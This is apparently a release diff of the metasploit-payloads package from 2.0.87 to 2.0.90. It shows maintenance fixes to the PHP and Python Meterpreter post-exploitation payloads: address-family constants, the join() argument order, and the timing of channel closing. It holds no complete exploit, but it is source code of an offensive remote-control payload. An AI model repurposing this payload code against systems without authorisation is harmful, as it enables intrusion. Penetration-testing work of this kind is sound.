metasploit-payloads 2.0.87 → 2.0.90

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 49948901cfa763b0f4c7d0ae6d62182efcda73f3ce3b982f0f4fa09d06236edd
-  data.tar.gz: 15778b5e44175b8c7bcd221de425922fe54f3d55ccbf267cdc7e57b8fb7d1ab2
+  metadata.gz: 3548518c88c1c94964e8b420803bd3008b78c44ba92fc25355476e837342dea7
+  data.tar.gz: f30727fbcd19f43a8659c24c1038952106cec46a72bfa33acdfe6468b26eec2b
 SHA512:
-  metadata.gz: 3b941a8549701f8e199a1ea8a0b9a2e58dcba63babb53755e0ecd6aa50a9b7ae0daff80d8b1c86a07fb3f73d97a9450aaade1d5c1a3a0147e67682031562c6e6
-  data.tar.gz: e85514e66ce9a2f8347aba4df2091a114b2d26b390fc79bd340752427eff3e3bd4756591257c0c6879c5346fff878cfc6e1d7439ee73257e372f0deb766a36f2
+  metadata.gz: 0e96793869bfc073c060b9332bbb96c47d80c3113eb2db82e4ce89eb0986b9b1f11a6053f0d011c3ba7e3ec91c25ab433114bf7030bb26cd07e391f2047c3ef7
+  data.tar.gz: 85ec22c2c15083db8e8d3c7bbff045de6d3dd71a22db26f46aecc738b3c93c84f6f3e0821b6d9538d87de8f40f2e649f72d66d4a2971cca27adc732b968b67f3

data/data/meterpreter/ext_server_stdapi.php

@@ -302,11 +302,6 @@ define("ERROR_CONNECTION_ERROR", 10000);
 # eval'd twice
 my_print("Evaling stdapi");
 
-##
-# Windows Constants
-##
-define("WIN_AF_INET", 2);
-define("WIN_AF_INET6", 23);
 
 ##
 # Search Helpers
@@ -456,9 +451,9 @@ function add_stat_buf($path) {
 if (!function_exists('resolve_host')) {
 function resolve_host($hostname, $family) {
     /* requires PHP >= 5 */
-    if ($family == AF_INET) {
+    if ($family == WIN_AF_INET) {
         $dns_family = DNS_A;
-    } elseif ($family == AF_INET6) {
+    } elseif ($family == WIN_AF_INET6) {
         $dns_family = DNS_AAAA;
     } else {
         my_print('invalid family, must be AF_INET or AF_INET6');
@@ -1054,7 +1049,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
         # full command line
         array_shift($proc);
         array_shift($proc);
-        $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_PATH, join($proc, " ")));
+        $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_PATH, join(" ", $proc)));
         packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_GROUP, $grp));
     }
     return ERROR_SUCCESS;
@@ -1265,11 +1260,7 @@ function stdapi_net_resolve_host($req, &$pkt) {
     $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
     $family = $family['value'];
 
-    if ($family == WIN_AF_INET) {
-        $family = AF_INET;
-    } elseif ($family == WIN_AF_INET6) {
-        $family = AF_INET6;
-    } else {
+    if ($family != WIN_AF_INET && $family != WIN_AF_INET6) {
         my_print('invalid family, must be AF_INET or AF_INET6');
         return ERROR_FAILURE;
     }
@@ -1292,11 +1283,7 @@ function stdapi_net_resolve_hosts($req, &$pkt) {
     $family_tlv = packet_get_tlv($req, TLV_TYPE_ADDR_TYPE);
     $family = $family_tlv['value'];
 
-    if ($family == WIN_AF_INET) {
-        $family = AF_INET;
-    } elseif ($family == WIN_AF_INET6) {
-        $family = AF_INET6;
-    } else {
+    if ($family != WIN_AF_INET && $family != WIN_AF_INET6) {
         my_print('invalid family, must be AF_INET or AF_INET6');
         return ERROR_FAILURE;
     }

data/data/meterpreter/meterpreter.php

@@ -148,6 +148,13 @@ define("CHANNEL_CLASS_STREAM",   1);
 define("CHANNEL_CLASS_DATAGRAM", 2);
 define("CHANNEL_CLASS_POOL",     3);
 
+
+##
+# Windows Constants
+##
+define("WIN_AF_INET", 2);
+define("WIN_AF_INET6", 23);
+
 #
 # TLV Meta Types
 #
@@ -1095,10 +1102,10 @@ function connect($ipaddr, $port, $proto='tcp') {
   # IPv6 requires brackets around the address in some cases, but not all.
   # Keep track of the un-bracketed address for the functions that don't like
   # brackets, specifically socket_connect and socket_sendto.
-  $ipf = AF_INET;
+  $ipf = WIN_AF_INET;
   $raw_ip = $ipaddr;
   if (FALSE !== strpos($ipaddr, ":")) {
-    $ipf = AF_INET6;
+    $ipf = WIN_AF_INET6;
     $ipaddr = "[". $raw_ip ."]";
   }
 

data/data/meterpreter/meterpreter.py

@@ -1348,6 +1348,7 @@ class PythonMeterpreter(object):
                 channel = self.channels[channel_id]
                 data = bytes()
                 write_request_parts = []
+                close_channel = False
                 if isinstance(channel, MeterpreterProcess):
                     if channel_id in self.interact_channels:
                         proc_h = channel.proc_h
@@ -1355,9 +1356,9 @@ class PythonMeterpreter(object):
                             data += proc_h.stderr_reader.read()
                         if proc_h.stdout_reader.is_read_ready():
                             data += proc_h.stdout_reader.read()
+                    # Defer closing the channel until the data has been sent
                     if not channel.is_alive():
-                        self.handle_dead_resource_channel(channel_id)
-                        channel.close()
+                        close_channel = True
                 elif isinstance(channel, MeterpreterSocketTCPClient):
                     while select.select([channel.fileno()], [], [], 0)[0]:
                         try:
@@ -1400,9 +1401,15 @@ class PythonMeterpreter(object):
                     ])
                     self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
 
+                if close_channel:
+                    channel.close()
+                    self.handle_dead_resource_channel(channel_id)
+
     def handle_dead_resource_channel(self, channel_id):
         if channel_id in self.interact_channels:
             self.interact_channels.remove(channel_id)
+        if channel_id in self.channels:
+            del self.channels[channel_id]
         self.send_packet(tlv_pack_request('core_channel_close', [
             {'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
         ]))
@@ -1641,8 +1648,6 @@ class PythonMeterpreter(object):
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
         status, response = channel.core_read(request, response)
-        if not channel.is_alive():
-            self.handle_dead_resource_channel(channel_id)
         return status, response
 
     def _core_channel_write(self, request, response):
@@ -1653,9 +1658,6 @@ class PythonMeterpreter(object):
         status = ERROR_FAILURE
         if channel.is_alive():
             status, response = channel.core_write(request, response)
-        # evaluate channel.is_alive() twice because it could have changed
-        if not channel.is_alive():
-            self.handle_dead_resource_channel(channel_id)
         return status, response
 
     def _core_channel_seek(self, request, response):

data/lib/metasploit-payloads/version.rb

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.87'
+  VERSION = '2.0.90'
 
   def self.version
     VERSION

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.87
+  version: 2.0.90
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2022-05-03 00:00:00.000000000 Z
+date: 2022-05-06 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake

metadata.gz.sig

@@ -1,2 +1,4 @@
-���h�P���\Q�
-�@I.�a��\i���[95�Lo�h+ˁ�Uq�	bġ���.�9C��^K
+�ǽr�
+e�rz�w8է�i�������k��p�U�*h�`'�e�#�����d2獯�*}/��M��ׄ�z$Y[(��z�Zʰ[�kv������d%�
+�mk�Q�����,�5Hd����y�6oX�*�Yt'�V�(i7�g�� �.���?n�.�X:L�p�O��-�oǔ9�	�v����8@�
+����f�)i	XG��%�8�V)��3��6}�gS�@